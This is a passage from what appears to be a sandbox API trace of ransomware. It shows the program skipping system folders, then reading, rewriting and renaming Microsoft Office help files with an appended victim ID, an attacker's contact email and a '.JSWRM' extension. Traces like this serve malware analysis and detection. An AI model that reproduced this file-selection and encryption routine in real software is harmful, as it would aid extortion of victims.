lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0122.628] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210450 [0122.628] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\WINPROJ_COL.HXT" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\winproj_col.hxt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0122.629] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=207) returned 1 [0122.630] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0122.630] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24be70 [0122.630] ReadFile (in: hFile=0x238, lpBuffer=0x24be70, nNumberOfBytesToRead=0xc0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24be70*, lpNumberOfBytesRead=0x345e89c*=0xc0, lpOverlapped=0x0) returned 1 [0122.630] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0122.631] WriteFile (in: hFile=0x238, lpBuffer=0x24be70*, nNumberOfBytesToWrite=0xc0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24be70*, lpNumberOfBytesWritten=0x345e898*=0xc0, lpOverlapped=0x0) returned 1 [0122.631] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24be70 | out: hHeap=0x1e0000) returned 1 [0122.631] CloseHandle (hObject=0x238) returned 1 [0122.631] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210a40 [0122.631] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0122.631] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0122.631] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0122.631] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0122.631] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0122.631] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0122.631] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a258 [0122.631] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a258, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0122.631] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a258 | out: hHeap=0x1e0000) returned 1 [0122.631] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d728 [0122.631] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2475b0 [0122.631] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d728 | out: hHeap=0x1e0000) returned 1 [0122.631] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0122.631] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\WINPROJ_COL.HXT" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\winproj_col.hxt"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\WINPROJ_COL.HXT.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\winproj_col.hxt.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0122.632] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2475b0 | out: hHeap=0x1e0000) returned 1 [0122.632] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210a40 | out: hHeap=0x1e0000) returned 1 [0122.632] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210450 | out: hHeap=0x1e0000) returned 1 [0122.632] FindNextFileW (in: hFindFile=0x231ac0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x3b93a5c4, ftCreationTime.dwHighDateTime=0x1d47c34, ftLastAccessTime.dwLowDateTime=0x3b93a5c4, ftLastAccessTime.dwHighDateTime=0x1d47c34, ftLastWriteTime.dwLowDateTime=0x3b93a5c4, ftLastWriteTime.dwHighDateTime=0x1d47c34, nFileSizeHigh=0x0, nFileSizeLow=0x72, dwReserved0=0x60002, dwReserved1=0x209598, cFileName="WINPROJ_F_COL.HXK", cAlternateFileName="WINPRO~3.HXK")) returned 1 [0122.632] lstrcmpiW (lpString1="WINPROJ_F_COL.HXK", lpString2=".") returned 1 [0122.632] lstrcmpiW (lpString1="WINPROJ_F_COL.HXK", lpString2="..") returned 1 [0122.632] lstrcmpiW (lpString1="WINPROJ_F_COL.HXK", lpString2="...") returned 1 [0122.632] lstrcmpiW (lpString1="WINPROJ_F_COL.HXK", lpString2="windows") returned 1 [0122.632] lstrcmpiW (lpString1="WINPROJ_F_COL.HXK", lpString2="recovery") returned 1 [0122.632] lstrcmpiW (lpString1="WINPROJ_F_COL.HXK", lpString2="perflogs") returned 1 [0122.632] lstrcmpiW (lpString1="WINPROJ_F_COL.HXK", lpString2="documents and settings") returned 1 [0122.632] lstrcmpiW (lpString1="WINPROJ_F_COL.HXK", lpString2="$RECYCLE.BIN") returned 1 [0122.632] lstrcmpiW (lpString1="WINPROJ_F_COL.HXK", lpString2="system volume information") returned 1 [0122.632] lstrcmpiW (lpString1="WINPROJ_F_COL.HXK", lpString2="msocache") returned 1 [0122.632] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0122.632] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WINPROJ_F_COL.HXK", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0122.633] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241308 [0122.633] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WINPROJ_F_COL.HXK", cchWideChar=17, lpMultiByteStr=0x241308, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WINPROJ_F_COL.HXK", lpUsedDefaultChar=0x0) returned 17 [0122.633] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0122.633] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0122.633] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WINPROJ_F_COL.HXK", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0122.633] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411f0 [0122.633] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WINPROJ_F_COL.HXK", cchWideChar=17, lpMultiByteStr=0x2411f0, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WINPROJ_F_COL.HXK", lpUsedDefaultChar=0x0) returned 17 [0122.633] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0122.633] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210ca0 [0122.633] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2106b0 | out: hHeap=0x1e0000) returned 1 [0122.633] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0122.633] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0122.633] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210e68 [0122.633] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\WINPROJ_F_COL.HXK" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\winproj_f_col.hxk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0122.633] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=114) returned 1 [0122.634] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0122.634] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x2093c8 [0122.634] ReadFile (in: hFile=0x238, lpBuffer=0x2093c8, nNumberOfBytesToRead=0x70, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x2093c8*, lpNumberOfBytesRead=0x345e89c*=0x70, lpOverlapped=0x0) returned 1 [0122.634] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0122.634] WriteFile (in: hFile=0x238, lpBuffer=0x2093c8*, nNumberOfBytesToWrite=0x70, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x2093c8*, lpNumberOfBytesWritten=0x345e898*=0x70, lpOverlapped=0x0) returned 1 [0122.635] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2093c8 | out: hHeap=0x1e0000) returned 1 [0122.635] CloseHandle (hObject=0x238) returned 1 [0122.635] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210580 [0122.635] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0122.635] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0122.635] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0122.635] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0122.635] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0122.635] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0122.635] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a480 [0122.635] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a480, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0122.635] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a480 | out: hHeap=0x1e0000) returned 1 [0122.635] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cca8 [0122.635] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247898 [0122.635] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cca8 | out: hHeap=0x1e0000) returned 1 [0122.635] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0122.635] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\WINPROJ_F_COL.HXK" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\winproj_f_col.hxk"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\WINPROJ_F_COL.HXK.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\winproj_f_col.hxk.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0122.636] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247898 | out: hHeap=0x1e0000) returned 1 [0122.636] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210580 | out: hHeap=0x1e0000) returned 1 [0122.636] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210e68 | out: hHeap=0x1e0000) returned 1 [0122.636] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411f0 | out: hHeap=0x1e0000) returned 1 [0122.636] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241308 | out: hHeap=0x1e0000) returned 1 [0122.636] FindNextFileW (in: hFindFile=0x231ac0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x3b93a5c4, ftCreationTime.dwHighDateTime=0x1d47c34, ftLastAccessTime.dwLowDateTime=0x3b93a5c4, ftLastAccessTime.dwHighDateTime=0x1d47c34, ftLastWriteTime.dwLowDateTime=0x3b93a5c4, ftLastWriteTime.dwHighDateTime=0x1d47c34, nFileSizeHigh=0x0, nFileSizeLow=0x71, dwReserved0=0x60002, dwReserved1=0x209598, cFileName="WINPROJ_K_COL.HXK", cAlternateFileName="WINPRO~1.HXK")) returned 1 [0122.636] lstrcmpiW (lpString1="WINPROJ_K_COL.HXK", lpString2=".") returned 1 [0122.636] lstrcmpiW (lpString1="WINPROJ_K_COL.HXK", lpString2="..") returned 1 [0122.636] lstrcmpiW (lpString1="WINPROJ_K_COL.HXK", lpString2="...") returned 1 [0122.636] lstrcmpiW (lpString1="WINPROJ_K_COL.HXK", lpString2="windows") returned 1 [0122.636] lstrcmpiW (lpString1="WINPROJ_K_COL.HXK", lpString2="recovery") returned 1 [0122.636] lstrcmpiW (lpString1="WINPROJ_K_COL.HXK", lpString2="perflogs") returned 1 [0122.636] lstrcmpiW (lpString1="WINPROJ_K_COL.HXK", lpString2="documents and settings") returned 1 [0122.636] lstrcmpiW (lpString1="WINPROJ_K_COL.HXK", lpString2="$RECYCLE.BIN") returned 1 [0122.636] lstrcmpiW (lpString1="WINPROJ_K_COL.HXK", lpString2="system volume information") returned 1 [0122.636] lstrcmpiW (lpString1="WINPROJ_K_COL.HXK", lpString2="msocache") returned 1 [0122.636] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0122.636] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WINPROJ_K_COL.HXK", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0122.636] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fc0 [0122.636] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WINPROJ_K_COL.HXK", cchWideChar=17, lpMultiByteStr=0x240fc0, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WINPROJ_K_COL.HXK", lpUsedDefaultChar=0x0) returned 17 [0122.636] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0122.636] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0122.637] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WINPROJ_K_COL.HXK", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0122.637] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f48 [0122.637] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WINPROJ_K_COL.HXK", cchWideChar=17, lpMultiByteStr=0x240f48, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WINPROJ_K_COL.HXK", lpUsedDefaultChar=0x0) returned 17 [0122.637] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0122.637] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2103b8 [0122.637] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210ca0 | out: hHeap=0x1e0000) returned 1 [0122.637] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0122.637] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0122.637] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210450 [0122.637] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\WINPROJ_K_COL.HXK" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\winproj_k_col.hxk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0122.637] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=113) returned 1 [0122.637] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0122.637] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209710 [0122.637] ReadFile (in: hFile=0x238, lpBuffer=0x209710, nNumberOfBytesToRead=0x70, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x209710*, lpNumberOfBytesRead=0x345e89c*=0x70, lpOverlapped=0x0) returned 1 [0122.638] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0122.638] WriteFile (in: hFile=0x238, lpBuffer=0x209710*, nNumberOfBytesToWrite=0x70, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x209710*, lpNumberOfBytesWritten=0x345e898*=0x70, lpOverlapped=0x0) returned 1 [0122.638] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209710 | out: hHeap=0x1e0000) returned 1 [0122.638] CloseHandle (hObject=0x238) returned 1 [0122.639] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2109a8 [0122.639] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0122.639] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0122.639] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0122.639] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0122.639] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0122.639] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0122.639] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a2a0 [0122.639] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a2a0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0122.639] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a2a0 | out: hHeap=0x1e0000) returned 1 [0122.639] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d7d0 [0122.639] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247f60 [0122.639] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d7d0 | out: hHeap=0x1e0000) returned 1 [0122.639] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0122.639] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\WINPROJ_K_COL.HXK" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\winproj_k_col.hxk"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\WINPROJ_K_COL.HXK.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\winproj_k_col.hxk.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0122.640] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247f60 | out: hHeap=0x1e0000) returned 1 [0122.640] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2109a8 | out: hHeap=0x1e0000) returned 1 [0122.640] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210450 | out: hHeap=0x1e0000) returned 1 [0122.640] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f48 | out: hHeap=0x1e0000) returned 1 [0122.640] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fc0 | out: hHeap=0x1e0000) returned 1 [0122.640] FindNextFileW (in: hFindFile=0x231ac0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x3b6d7fcc, ftCreationTime.dwHighDateTime=0x1d47c34, ftLastAccessTime.dwLowDateTime=0x3b6d7fcc, ftLastAccessTime.dwHighDateTime=0x1d47c34, ftLastWriteTime.dwLowDateTime=0x3b93a5c4, ftLastWriteTime.dwHighDateTime=0x1d47c34, nFileSizeHigh=0x0, nFileSizeLow=0x5eeea, dwReserved0=0x60002, dwReserved1=0x209598, cFileName="WINPROJ_STD.HXS", cAlternateFileName="WINPRO~1.HXS")) returned 1 [0122.640] lstrcmpiW (lpString1="WINPROJ_STD.HXS", lpString2=".") returned 1 [0122.640] lstrcmpiW (lpString1="WINPROJ_STD.HXS", lpString2="..") returned 1 [0122.640] lstrcmpiW (lpString1="WINPROJ_STD.HXS", lpString2="...") returned 1 [0122.640] lstrcmpiW (lpString1="WINPROJ_STD.HXS", lpString2="windows") returned 1 [0122.640] lstrcmpiW (lpString1="WINPROJ_STD.HXS", lpString2="recovery") returned 1 [0122.640] lstrcmpiW (lpString1="WINPROJ_STD.HXS", lpString2="perflogs") returned 1 [0122.640] lstrcmpiW (lpString1="WINPROJ_STD.HXS", lpString2="documents and settings") returned 1 [0122.640] lstrcmpiW (lpString1="WINPROJ_STD.HXS", lpString2="$RECYCLE.BIN") returned 1 [0122.640] lstrcmpiW (lpString1="WINPROJ_STD.HXS", lpString2="system volume information") returned 1 [0122.640] lstrcmpiW (lpString1="WINPROJ_STD.HXS", lpString2="msocache") returned 1 [0122.640] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241128 [0122.640] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WINPROJ_STD.HXS", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0122.640] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WINPROJ_STD.HXS", cchWideChar=15, lpMultiByteStr=0x345ebd8, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WINPROJ_STD.HXS", lpUsedDefaultChar=0x0) returned 15 [0122.641] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241128 | out: hHeap=0x1e0000) returned 1 [0122.641] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412b8 [0122.641] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WINPROJ_STD.HXS", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0122.641] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WINPROJ_STD.HXS", cchWideChar=15, lpMultiByteStr=0x345eba8, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WINPROJ_STD.HXS", lpUsedDefaultChar=0x0) returned 15 [0122.641] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412b8 | out: hHeap=0x1e0000) returned 1 [0122.641] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210748 [0122.641] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2103b8 | out: hHeap=0x1e0000) returned 1 [0122.641] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0122.641] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0122.641] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210618 [0122.641] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\WINPROJ_STD.HXS" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\winproj_std.hxs"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0122.642] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=388842) returned 1 [0122.642] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0122.642] 